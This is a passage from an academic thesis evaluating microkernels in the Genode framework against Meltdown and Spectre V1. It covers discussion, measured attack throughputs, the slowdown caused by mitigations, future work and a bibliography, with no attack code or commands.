There are some concerns with the sources used in this thesis. With regards to CPUoptimizations, information is in many cases not that specific, describing only the principlemechanisms and not the exact rules by which they function. This leaves the methodologyand results prone to anomalies which are difficult to explain. Information relating to theexact workings of many of these mechanisms are proprietary and are thus not available.However, for the purpose of these experiments, these models have proven sufficient toimplement working attacks. An exception to the error sources with hardware mechanismsare the methods for timing. This information is deemed more reliable, as Intel has publishedexact recommendations for timing on their CPUs. Similarly, for information regarding IntelTSX, the inner workings of this instruction set are not of interest for these attacks, merelytheir public specification.

For the implementation of Meltdown and Spectre, the primary sources are the originalpapers [31, 24]. These also contain POC implementations which have been used to defineimplementation parameters as well as central design concepts. Although this is considereda good source, the workings of the presented Meltdown and Spectre POCs are not closelydescribed. There is a substantial body of work related to Meltdown [31, 36, 45] and Spectre[24, 33, 42, 22] but very few present source code. Consequently, a combination of these POCsand implementations found on Github have been used. We can not vouch for the quality ofthese sources besides their merit of supplying working implementations.

For information regarding Genode, the primary source has been the book GenodeFoundations [7] by Feske. Some other work relating to security and Genode was found viaGoogle Scholar, primarily relating to the use of Genode and ARM TrustZone for Android. Nowork related to Meltdown and Spectre on Genode has been found. Therefore, an email byFeske1 has been the primary source of information for microarchitectural attacks in Genode.To search for sources on Genode the databases IEEE Xplore, ACM digital library and GoogleScholar were used.


47



5.5. The Work in a Wider Context

5.5 The Work in a Wider Context

The subject of microarchitectural attacks, Spectre and Meltdown in particular, have receivedmuch attention since the work of Kocher et al. [24] and Lipp et al. [31]. This is nosurprise, as Lipp et al. showed that the Meltdown attack can dump memory from a victimprocess, demonstrating this on Firefox. Similarly, Kocher et al. showed that a Spectre attackcan be used to leak host memory from within a virtualized environment. Since then,several others have contributed to these types of attacks. As brought up by Mcilroy etal. [33], microarchitectural attacks are not easily resolvable and they are a bigger problemthan previously anticipated. Mcilroy et al. found abstractions to be an issue, that is, ourview of how the CPU functions is overly simplified and knowledgeable attackers mayexploit this fact, especially in the pursuit of uncompromising performance. Consequently,microarchitectural state has been assumed unobservable. Although CPUs become faster,they also become more complex, with this complexity comes a security cost and likely morecomplexity to address security issues. Microkernels are certainly an approach to reduce thecomplexity of the core kernel, but the kernels separation is threatened if user processes canbypass the kernel’s barriers.

5.5.1 Can OS Memory Separation be Trusted?

As brought up by Mcilroy et al. [33], OS memory separation can be of great use sinceuser-process separation cannot guarantee separation when hardware is untrusted. Memoryprotection by the OS may be of some help, if not against Spectre, it definitively protectsagainst the workings of Meltdown. Microkernels may not by definition mitigate Meltdownbut may keep less exploitable information for Meltdown. Furthermore, there is little toindicate that microkernels help the issue with respect to Spectre. There are mitigations tovariations of Spectre, but new versions of the attack such as NetSpectre [42] and SpectreRSB[25] indicate that the problem may be bigger than anticipated. However, something whichmay prove in favor of microkernels is the small code size. A small code size may make theanalysis against microarchitectural attacks easier. Still, the problem remains as much of theissues are closely related to the workings of hardware.

5.5.2 Can Hardware Separation be Trusted?

The scope of Spectre attacks are likely more widespread than anticipated as Mcilroy et al.stated [33]. Although they were not successful in demonstrating these attacks on ARM andAMD CPUs, they too utilize an RSB. Thus, there may be interest in investigating possibilitiesto utilize SCAs to violate the ARM Trustzone use-cases for Genode. It is likely that someuse-cases is vulnerable to SCAs; as it has been demonstrated by Bukasa et al. [3] that theARM Trustzone is ineffective at preventing power analysis SCAs and, Lapid and Wool [29]mounted a side-channel cache attack against the ARM32 AES implementation.

5.5.3 Consequences for Security and Safety Critical Systems

The presence of microarchitectural attacks may compromise claims of security against certaintypes of attacks. Still, secure design may leave valuable guarantees against other typesof attacks. Values in that microarchitectural attack are not trivial in construction and inmany cases requires execution privileges on the device. Although the difficulty of the attackexecution may change and that local execution privileges may not be a requirement asshown by Schwarz et al. with NetSpectre [42] and Lipp et al. with [30]. For very safety orsecurity-critical applications, such as medical devices and vehicular communications, usingspecialized hardware which is not affected by known attacks needs to be considered.

48

5.5. The Work in a Wider Context

5.5.4 Impact of This Work

Microarchitectural attacks do pose a threat to privacy and security as demonstrated byseveral works [31]2. This work demonstrates that efforts to obtain a truly secure kernelusing Genode is not without its security flaws. The kernel may still be vulnerable tomicroarchitectural attacks. Consequently, high assurance applications can still not giveabsolute guarantees. There is a need for awareness of microarchitectural attacks and possiblymitigation. In the case demonstrated in this thesis, countermeasures can be put in place tosecure communication mechanisms against Spectre V1.

2J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/Articles/744287/ (visited on 2019-03-25).

49



6 Conclusion

In this thesis we have examined the vulnerability of microkernels with respect to themicroarchitectural attacks Meltdown and Spectre V1. Furthermore, the performance impactof Spectre V1 mitigations were examined. The targeted microkernels were Okl4, Novaand Linux. These kernels were run within the Genode OS framework for evaluation.Thesuccessful Meltdown implementation required Intel TSX as suppressing a segmentation faultwas not an option. Another design based on spawning processes may prove successful butincurs extra runtime costs; no successful results were produced with such a design.

• Can Flush+Reload be used to create a covert channel between two processes in Genode, measuredas the throughput of demonstrated channel?

A covert Flush+Reload channel was demonstrated in Genode with a throughput of 36Bps on Okl4, 44 Bps on Nova and 13409 Bps on Linux. The large discrepancy betweenLinux and microkernels deemed likely to stem from scheduling differences.

• Are RPC mechanisms in the microkernels Nova and Okl4 vulnerable to the Spectre, measuredas throughput of demonstrated attack?

Microkernels were determined to be vulnerable to Spectre V1 and a POC was producedwith a throughput 1029 Bps on Okl4, 1760 Bps on Nova and 525 Bps on Linux.

• Can the Meltdown attack be executed on Genode?

Results regarding microkernels vulnerability to Meltdown are inconclusive. However,an attack reading the secret of another process in Genode running on Linux wasdemonstrated with a throughput of 11070 Bps.

• What is the performance impact of Spectre V1 mitigations alternatives, measured as relativeslowdown of RPC mechanisms?

The Spectre mitigations of bitmasking and instruction stream serialization wasevaluated, yielding relative slowdown of 3% for serialization and 4% forbitmasking, see Tables 4.14 and 4.15.

It was determined that microkernels and Genode are not secure by design againstmicroarchitectural attacks. This has been demonstrated by the Spectre V1 attack with a

50

6.1. Future Work

throughput ¡ 1kB/s and the Meltdown attack with throughput ¡ 10kB/s. Microkernels dohave some benefits with regards to mitigating Meltdown as several kernels do not map kernelspace into user space and are consequently only affected by Meltdown in a limited way. Inaddition, Genode does not support for custom segmentation fault handlers. Consequently,the Meltdown attack requires another recovery tool, one such viable option is Intel TSX.

6.1 Future Work

For future work, the most obvious thing is to determine a target for the Meltdown attackagainst microkernels in Genode and rigorously attack these targeted addresses. It can also beinteresting to pursue another segmentation fault recovery design; this is interesting as IntelTSX is only present on some Intel CPUs [20].

With respect to Spectre V1, it may be interesting to target existing Genode componentswhich expose vulnerable RPCs or implement other Spectre variants which use differenttechniques, such as variants 2, 3 or SectreRSB [24, 25]. Trying these different variants canfurther establish the scope of Spectre’s impact on microkernels.

51

Bibliography

[1] T. Brito, N. O. Duarte, and N. Santos. “ARM TrustZone for Secure Image Processing onthe Cloud”. In: IEEE 35th Symposium on Reliable Distributed Systems Workshops (SRDSW).Sept. 2016, pp. 37–42. DOI: 10.1109/SRDSW.2016.17.

[2] D. Brumley and D. Boneh. “Remote Timing Attacks Are Practical”. In: Proceedings of the12th Conference on USENIX Security Symposium. SSYM. event-place: Washington, DC.USENIX Association, 2003.

[3] S. K. Bukasa, R. Lashermes, H. Le Bouder, J. Lanet, and A. Legay. “How TrustZoneCould Be Bypassed: Side-Channel Attacks on a Modern System-on-Chip”. en. In:Information Security Theory and Practice. Ed. by G.P. Hancke and E. Damiani. Vol. 10741.Cham: Springer International Publishing, 2018, pp. 93–109. ISBN: 978-3-319-93523-2 978-3-319-93524-9. DOI: 10.1007/978-3-319-93524-9_6.

[4] cgroups(7) - Linux manual page. URL: http://man7.org/linux/man-pages/man7/cgroups.7.html (visited on 2019-02-21).

[5] S. Constable, A. Sahebolamri, and S. Chapin. “Extending seL4 Integrity to the GenodeOS Framework”. In: (2017).

[6] J. Corbet and G. Kroah-Hartman. “Linux Kernel Development How Fast It is Going,Who is Doing It, What They Are Doing and Who is Sponsoring the Work”. In: (2016),p. 18. URL: http://go.linuxfoundation.org/l/6342/el-Development-Report-2016-pdf/3vr4pg.

[7] N. Feske. Foundations: GENODE Operating System Framework 18.05. GENODE LABS,2018. URL: https://genode.org/documentation/genode-foundations-18-05.pdf.

[8] Q. Ge, Y. Yarom, D. Cock, and G. Heiser. “A survey of microarchitectural timingattacks and countermeasures on contemporary hardware”. In: Journal of CryptographicEngineering 8.1 (Apr. 2018), pp. 1–27. ISSN: 2190-8508, 2190-8516. DOI: 10 . 1007 /s13389-016-0141-6.

[9] D. Gens, O. Arias, D. Sullivan, C. Liebchen, Y. Jin, and A. R. Sadeghi. “LAZARUS:Practical Side-Channel Resilient Kernel-Space Randomization”. In: Research in Attacks,Intrusions, and Defenses. Ed. by M. Dacier, M. Bailey, M. Polychronakis, and M.Antonakakis. Springer International Publishing, 2017, pp. 238–258. ISBN: 978-3-319-66332-6.

52

https://doi.org/10.1109/SRDSW.2016.17

https://doi.org/10.1007/978-3-319-93524-9_6

http://man7.org/linux/man-pages/man7/cgroups.7.html

http://man7.org/linux/man-pages/man7/cgroups.7.html

http://go.linuxfoundation.org/l/6342/el-Development-Report-2016-pdf/3vr4pg

http://go.linuxfoundation.org/l/6342/el-Development-Report-2016-pdf/3vr4pg

https://genode.org/documentation/genode-foundations-18-05.pdf

https://genode.org/documentation/genode-foundations-18-05.pdf

https://doi.org/10.1007/s13389-016-0141-6

https://doi.org/10.1007/s13389-016-0141-6

Bibliography

[10] D. Gruss, R. Spreitzer, and S. Mangard. “Cache Template Attacks: Automating Attackson Inclusive Last-level Caches”. In: Proceedings of the 24th USENIX Conference on SecuritySymposium. SEC. event-place: Washington, D.C. USENIX Association, 2015, pp. 897–912. ISBN: 978-1-931971-23-2.

[11] D. Gullasch, E. Bangerter, and S. Krenn. “Cache Games – Bringing Access-Based CacheAttacks on AES to Practice”. In: IEEE Symposium on Security and Privacy. IEEE, May2011, pp. 490–505. ISBN: 978-1-4577-0147-4. DOI: 10.1109/SP.2011.22.

[12] M. Hamad, M. Nolte, and V. Prevelakis. “A framework for policy based secure intravehicle communication”. In: 2017 IEEE Vehicular Networking Conference (VNC). Nov.2017, pp. 1–8. DOI: 10.1109/VNC.2017.8275646.

[13] M. Hamad and V. Prevelakis. “Implementation and performance evaluation ofembedded IPsec in microkernel OS”. In: World Symposium on Computer Networks andInformation Security (WSCNIS). Sept. 2015, pp. 1–7. DOI: 10.1109/WSCNIS.2015.7368294.

[14] S. Harp, T. Carpenter, and J. Hatcliff. “A Reference Architecture for Secure MedicalDevices”. In: Biomedical Instrumentation & Technology 52.5 (Sept. 2018), pp. 357–365. ISSN:0899-8205. DOI: 10.2345/0899-8205-52.5.357.

[15] U. D. R. Hat. “What Every Programmer Should Know About Memory”. In: (2007),p. 114.

[16] C. Hawblitzel, J. Howell, J. R. Lorch, A. Narayan, B. Parno, D. Zhang, and B.Zill. “Ironclad Apps: End-to-end Security via Automated Full-System Verification”.en. In: Proceedings of the 11th USENIX conference on Operating Systems Design andImplementation. 2014, p. 18. ISBN: 978-1-931971-16-4.

[17] P. K. Immich, R. S. Bhagavatula, and D. Ravi Pendse. “Performance analysis of fiveinterprocess communication mechanisms across UNIX operating systems.” In: TheJournal of Systems & Software 68 (2003), pp. 27–43. ISSN: 0164-1212. DOI: 10.1016/S0164-1212(02)00134-6.

[18] Corporation Intel. “Intel Analysis of Speculative Execution Side Channels”. en. In:(2018), p. 12.

[19] Corporation Intel. “Intel® 64 and IA-32 Architectures Optimization ReferenceManual”. en. In: (2016), p. 672.

[20] Corporation Intel. “Intel® 64 and IA-32 Architectures Software Developer’s ManualDocumentation Changes”. en. In: (Sept. 2016), p. 1299.

[21] G. Irazoqui, T. Eisenbarth, and B. Sunar. “S$A: A Shared Cache Attack That Worksacross Cores and Defies VM Sandboxing – and Its Application to AES”. In: IEEESymposium on Security and Privacy. 2015, pp. 591–604. DOI: 10.1109/SP.2015.42.

[22] V. Kiriansky and C. Waldspurger. “Speculative Buffer Overflows: Attacks andDefenses”. en. In: (July 2018).

[23] G. Klein, K. Elphinstone, G. Heiser, J. Andronick, D. Cock, P. Derrin, D. Elkaduwe, K.Engelhardt, R. Kolanski, M. Norrish, T. Sewell, H. Tuch, and S. Winwood. “seL4: FormalVerification of an OS Kernel”. In: 22Nd Symposium on Operating Systems Principles(SOSP). ACM, 2009, pp. 207–220. ISBN: 978-1-60558-752-3. DOI: 10.1145/1629575.1629596.

[24] P. Kocher, J. Horn, A. Fogh, D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp,S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom. “Spectre Attacks: ExploitingSpeculative Execution”. In: 40th IEEE Symposium on Security and Privacy (S&P). 2019.

[25] E. M. Koruyeh, K. N Khasawneh, C. Song, and N. Abu-Ghazaleh. “Spectre Returns!Speculation Attacks using the Return Stack Buffer”. In: 12th Workshop on OffensiveTechnologies (WOOT) (2018), p. 12.

53

https://doi.org/10.1109/SP.2011.22

https://doi.org/10.1109/VNC.2017.8275646

https://doi.org/10.1109/WSCNIS.2015.7368294

https://doi.org/10.1109/WSCNIS.2015.7368294

https://doi.org/10.2345/0899-8205-52.5.357

https://doi.org/10.1016/S0164-1212(02)00134-6

https://doi.org/10.1016/S0164-1212(02)00134-6

https://doi.org/10.1109/SP.2015.42

https://doi.org/10.1145/1629575.1629596

https://doi.org/10.1145/1629575.1629596

Bibliography

[26] C. Lameter. “Extreme high performance computing or why microkernels suck”. In:Proceedings of the Ottawa Linux Symposium. 2007.

[27] B. W. Lampson. “A Note on the Confinement Problem”. In: Commun. ACM 16.10 (Oct.1973), pp. 613–615. ISSN: 0001-0782. DOI: 10.1145/362375.362389.

[28] M. Lange, S. Liebergeld, A. Lackorzynski, A. Warg, and M. Peter. “L4Android: AGeneric Operating System Framework for Secure Smartphones”. In: Proceedings of the1st ACM Workshop on Security and Privacy in Smartphones and Mobile Devices. SPSM.ACM, 2011, pp. 39–50. ISBN: 978-1-4503-1000-0. DOI: 10.1145/2046614.2046623.

[29] B. Lapid and A. Wool. “Cache-Attacks on the ARM TrustZone Implementations of AES-256 and AES-256-GCM via GPU-Based Analysis”. In: Selected Areas in Cryptography(SAC). Ed. by C. Cid and M. J. Jacobson. Vol. 11349. 2019, pp. 235–256. ISBN: 978-3-030-10969-1 978-3-030-10970-7. DOI: 10.1007/978-3-030-10970-7_11.

[30] M. Lipp, M. T. Aga, M. Schwarz, D. Gruss, C. Maurice, L. Raab, and L.Lamster. “Nethammer: Inducing Rowhammer Faults through Network Requests”. In:abs/1805.04956 (May 2018).

[31] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P.Kocher, D. Genkin, Y. Yarom, and M. Hamburg. “Meltdown: Reading Kernel Memoryfrom User Space”. In: 27th USENIX Security Symposium. 2018.

[32] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee. “Last-Level Cache Side-ChannelAttacks are Practical”. In: IEEE Symposium on Security and Privacy. IEEE, May 2015,pp. 605–622. ISBN: 978-1-4673-6949-7. DOI: 10.1109/SP.2015.43.

[33] R. Mcilroy, J. Sevcik, T. Tebbi, B. L. Titzer, and T. Verwaest. “Spectre is here to stay: Ananalysis of side-channels and speculative execution”. In: abs/1902.05178 (Feb. 2019).arXiv: 1902.05178.

[34] G. Paoloni. How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Intruction SetArchitectures. Sept. 2010.

[35] P. Pessl, D. Gruss, C. Maurice, M. Schwarz, and S. Mangard. “DRAMA: ExploitingDRAM Addressing for Cross-CPU Attacks”. en. In: 2016, pp. 565–581.

[36] A. Prout, W. Arcand, D. Bestor, B. Bergeron, C. Byun, V. Gadepally, M. Houle, M.Hubbell, M. Jones, A. Klein, P. Michaleas, L. Milechin, J. Mullen, A. Rosa, S. Samsi, C.Yee, A. Reuther, and J. Kepner. “Measuring the Impact of Spectre and Meltdown”. In:IEEE High Performance extreme Computing Conference (HPEC). Sept. 2018, pp. 1–5. DOI:10.1109/HPEC.2018.8547554.

[37] J. R. Ramos. “TrustFrame, a Software Development Framework for TrustZone-enabledHardware”. en. PhD thesis. Tecnico Ulisboa, Nov. 2016.

[38] P. S. Ribeiro, N. Santos, and N. O. Duarte. “DBStore: A TrustZone-backed DatabaseManagement System for Mobile Applications”. en. In: (2018), p. 8. DOI: 10.5220/0006883603960403.

[39] W. Schmidt, M. Hanspach, and J. Keller. “A Case Study on Covert ChannelEstablishment via Software Caches in High-Assurance Computing Systems”. In: (Aug.2015).

[40] M. Schwarz, M. Lipp, D. Moghimi, J. V. Bulck, J. Stecklina, T. Prescher, and D. Gruss.“ZombieLoad: Cross-Privilege-Boundary Data Sampling”. en. In: (May 2019), p. 15.

[41] M. Schwarz, C. Maurice, D. Gruss, and S. Mangard. “Fantastic Timers and Whereto Find Them: High-Resolution Microarchitectural Attacks in JavaScript”. en. In:Financial Cryptography and Data Security. Lecture Notes in Computer Science. SpringerInternational Publishing, 2017, pp. 247–267. ISBN: 978-3-319-70972-7.

54

https://doi.org/10.1145/362375.362389

https://doi.org/10.1145/2046614.2046623

https://doi.org/10.1007/978-3-030-10970-7_11

https://doi.org/10.1109/SP.2015.43

https://doi.org/10.1109/HPEC.2018.8547554

https://doi.org/10.5220/0006883603960403

https://doi.org/10.5220/0006883603960403

Bibliography

[42] M. Schwarz, M. Schwarzl, M. Lipp, and D. Gruss. “NetSpectre: Read Arbitrary Memoryover Network”. In: abs/1807.10535 (2018).

[43] B. Stuart. “Current state of mitigations for Spectre within operating systems”. In:Proceedings of Workshop on Advanced Microkernel Operating Systems (WAMOS) (2018), p. 5.

[44] A. Thongthua and S. Ngamsuriyaroj. “Assessment of Hypervisor Vulnerabilities.” In:International Conference on Cloud Computing Research and Innovations (ICCCRI) (2016),p. 71. ISSN: 978-1-5090-3951-7. DOI: 10.1109/ICCCRI.2016.19.

[45] C. Trippel, D. Lustig, and M. Martonosi. “MeltdownPrime and SpectrePrime:Automatically-Synthesized Attacks Exploiting Invalidation-Based CoherenceProtocols”. In: CoRR abs/1802.03802 (2018).

[46] D. Waddington, J. Colmenares, J. Kuang, and F. Song. “KV-Cache: A Scalable High-Performance Web-Object Cache for Manycore”. en. In: IEEE/ACM 6th InternationalConference on Utility and Cloud Computing. IEEE, Dec. 2013, pp. 123–130. ISBN: 978-0-7695-5152-4. DOI: 10.1109/UCC.2013.34.

[47] Y. Xiao, X. Zhang, Y. Zhang, and R. Teodorescu. “One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and Privilege Escalation”. en. In: USENIX Association, 2016,pp. 19–35. ISBN: 978-1-931971-32-4.

[48] Y. Yarom and K. Falkner. “Flush+reload: a high resolution, low noise, l3 cacheside-channel attack”. en. In: 23rd USENIX Security Symposium USENIX Security. TheUSENIX Association, 2014. ISBN: 978-1-931971-15-7.

[49] Z. Yu, C. Yuan, X. Wei, Y. Gao, and L. Wang. “Message-passing interprocesscommunication design in seL4”. In: 5th International Conference on Computer Science andNetwork Technology (ICCSNT). Dec. 2016, pp. 418–422. DOI: 10.1109/ICCSNT.2016.8070192.

[50] P. Zhou, T. Wang, G. Li, F. Zhang, and X. Zhao. “Analysis on the parameterselection method for FLUSH+RELOAD based cache timing attack on RSA”. In: ChinaCommunications 12.6 (June 2015), pp. 33–45. ISSN: 1673-5447. DOI: 10.1109/CC.2015.7122479.

55

https://doi.org/10.1109/ICCCRI.2016.19

https://doi.org/10.1109/UCC.2013.34

https://doi.org/10.1109/ICCSNT.2016.8070192

https://doi.org/10.1109/ICCSNT.2016.8070192

https://doi.org/10.1109/CC.2015.7122479

https://doi.org/10.1109/CC.2015.7122479

examining the impact of micro- architectural attacks on

Documents